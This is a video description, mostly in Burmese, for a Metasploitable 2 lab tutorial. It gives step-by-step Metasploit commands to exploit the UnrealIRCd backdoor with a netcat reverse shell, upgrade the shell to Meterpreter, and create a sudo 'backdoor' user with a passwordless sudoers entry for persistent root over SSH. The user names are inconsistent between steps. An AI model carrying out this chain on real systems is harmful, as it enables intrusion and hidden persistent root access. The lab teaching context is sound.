Back to Browse

Metasploit Post-Exploitation: Meterpreter + Backdoor Persistence #educationpurposeonly

22 views
May 11, 2026
8:14

Hacker တွေ ဘယ်လို Access ကို ထိန်းသိမ်းကြလဲ ဆိုတာကို Metasploitable 2 Lab မှာ စမ်းကြမယ်။ ဒါနည်းလမ်းက နားလည်ပြီးသားတွေ အတွက်တော့ လွယ်ပေမဲ့ ခုမှ စတင်လေလာမဲ့ သူတွေ အတွက်တော့ တစ်ခုခု အထောက်ကူဖြစ်စေဖို့ ရည်ရွယ်ပါတယ်။ ( Education Purpose ) PHASE 1 - Shell (UnrealIRCd Exploit) use exploit/unix/irc/unreal_ircd_3281_backdoor UnrealIRCd 3.2.8.1 - IRC Server မှာ backdoor vulnerability ရှိတယ်။ ဒီ exploit module ကို load လုပ်တယ်။ Port 6667 မှာ run နေတဲ့ IRC service ကို target ဆက်လုပ်မယ်။ set RHOSTS 192.168.56.5 RHOSTS = Remote Host (Target IP) 192.168.56.5 က Metasploitable 2 VM ဖြစ်တယ်။ ဒါ ကျွန်တော်တို့ attack မဲ့ target ဖြစ်တယ်။ ဒီ Video မှာတော့ Attack ကို လုပ်ထားတာမို့ Traget IP သိဖို့ ၊ Reconnaissance ( Data တွေ စုဆောင်းဖို့ nmap သုံးလို့ ရပါတယ်) အပိုင်းကို မလုပ်ပြထားပါဘူး။ set LHOST 192.168.56.4 LHOST = Local Host (ကျွန်တော်တို့ Kali IP) Target က ကျွန်တော်တို့ ဆီ reverse connection ပြန်ဆက်ဖို့ လိုတယ်။ ကိုယ်ရဲ့ IP ကို သိမ်းထားပေးတာ ဖြစ်တယ်။ set PAYLOAD cmd/unix/reverse_netcat PAYLOAD = Exploit အောင်မြင်ပြီးနောက် ဘာ run မလဲ cmd/unix/reverse_netcat = Netcat ကို သုံးပြီး reverse shell ပို့တယ် Unix/Linux target အတွက် compatible ဖြစ်ပါတယ်။ exploit Exploit စတင် run တယ်။ Started reverse TCP handler - ကျွန်တော်တို့ ဘက်မှာ incoming connection စောင့်တယ် Connected to 192.168.56.5:6667 - Target နဲ့ connect ဖြစ်တယ် Command shell session opened - SHELL ရပြီ! ✅ Ctrl + Z - y d Shell session ကို background ထားတယ်။ Session kill မဖြစ်ဘူး - alive ဆက်ရှိနေမယ်။ msf6 prompt ကို ပြန်ရောက်မယ်။ PHASE 2 - Shell မှ Meterpreter Upgrade use post/multi/manage/shell_to_meterpreter Post-exploitation module load လုပ်တယ်။ Basic shell ကို powerful Meterpreter session ကို upgrade လုပ်ပေးတဲ့ module ဖြစ်တယ်။ post = post-exploitation, multi = multiple OS support set SESSION 1 SESSION 1 = ခုနက background ထားခဲ့တဲ့ shell session ဒီ session ကို Meterpreter ကို upgrade လုပ်မယ်။ sessions command နဲ့ session numbers ကြည့်လို့ ရတယ်။ run Upgrade process စတင်တယ်။ Sending stage - Meterpreter code ကို target ဆီ ပို့တယ် Meterpreter session 2 opened - Upgrade အောင်မြင်တယ် ✅ sessions Active sessions အကုန် list ပြတယ်။ Session 1 = basic shell (cmd/unix) Session 2 = meterpreter x86/linux (upgrade ဖြစ်ပြီ) sessions -i 2 -i = interact (ချိတ်ဆက်ဖို့) Session 2 (Meterpreter) ထဲ ဝင်တယ်။ meterpreter prompt ရရင် အောင်မြင်တယ် ✅ shell Meterpreter ထဲကနေ basic bash shell ကို drop down တယ်။ ဒီနေ့ကနေ Linux native commands (id, whoami, cat) တွေ run လုပ်လို့ ရမယ်။ exit ရိုက်ရင် Meterpreter ကို ပြန်ရောက်မယ်။ PHASE 3 - Persistence (Backdoor User) useradd -m -s /bin/bash backdoor3 useradd = new user create လုပ်တဲ့ command -m = home directory (/home/backdoor) create လုပ်ပါ -s /bin/bash = login shell အဖြစ် bash သုံးပါ backdoor3 = username passwd backdoor3 backdoor3 user ရဲ့ password set လုပ်တယ်။ Enter new UNIX password: hacked123 Retype new UNIX password: hacked123 password updated successfully ✅ usermod -aG sudo backdoor usermod = user ကို modify လုပ်တယ် -a = append (existing groups ကို မဖျက်ဘဲ add လုပ်ပါ) -G sudo = sudo group ထဲ ထည့်ပါ backdoor user sudo privileges ရပြီ cat /etc/passwd | grep backdoor3 backdoor user successfully created ဖြစ်မဖြစ် verify လုပ်တယ်။ backdoor:x:1003:1003::/home/backdoor:/bin/bash UID 1003, GID 1003, Home: /home/backdoor ✅ echo "backdoor ALL=(ALL) NOPASSWD:ALL" /etc/sudoers (ဒီနေရာမှာ Angle Bracket ၂ ခုပါတယ် Video မှာ သေချာကြည့်ပါ ၊ ဒီမှာ ရိုက်ဖို့ YT ဘက်က ခွင့်မပြုထားလို့ပါ)) backdoor user ကို root privileges အပြည့် ပေးတယ်။ NOPASSWD = sudo သုံးတဲ့အချိန် password မမေးဘူး ALL=(ALL) = ဘယ် command မဆို run ပိုင်ခွင့် ရတယ် /etc/sudoers = sudo permissions သိမ်းတဲ့ file PHASE 4 - Persistence Verify (SSH Login) ssh -oHostKeyAlgorithms=+ssh-rsa [email protected] ssh = Secure Shell - encrypted remote connection -o = extra option ထည့်တယ် HostKeyAlgorithms=+ssh-rsa = old RSA algorithm ကို accept လုပ်ပါ (Metasploitable 2 က old SSH version သုံးတာကြောင့် လိုတယ်) [email protected] = user@target_IP whoami Current logged-in user ကို စစ်တယ်။ backdoor ထွက်ရမယ် - SSH login အောင်မြင်တယ် ✅ Meterpreter မပါဘဲ access ရနေပြီ = Persistence confirmed! sudo su sudo = superuser permission နဲ့ run ပါ su = switch user (root ကို switch) backdoor user မှာ NOPASSWD sudo ရှိတာကြောင့် password မမေးဘူး root prompt ရရင် Privilege Escalation အောင်မြင်တယ် ✅ whoami ဒီ Lab မှာ အဆင့်ဆင့် စမ်းပြီးရင် root ထွက်ရမယ် ✅ ကျွန်တော်တို့ ယခု: ✅ Exploit လုပ်ပြီ (UnrealIRCd) ✅ Meterpreter ရပြီ ✅ Credentials harvest လုပ်ပြီ ✅ Backdoor user ထည့်ပြီ ✅ Persistence confirm ဖြစ်ပြီ ✅ Root access ရပြီ #ascendingnexusacademy #education #educationpurpose #pentester

Download

0 formats

No download links available.

Metasploit Post-Exploitation: Meterpreter + Backdoor Persistence #educationpurposeonly | NatokHD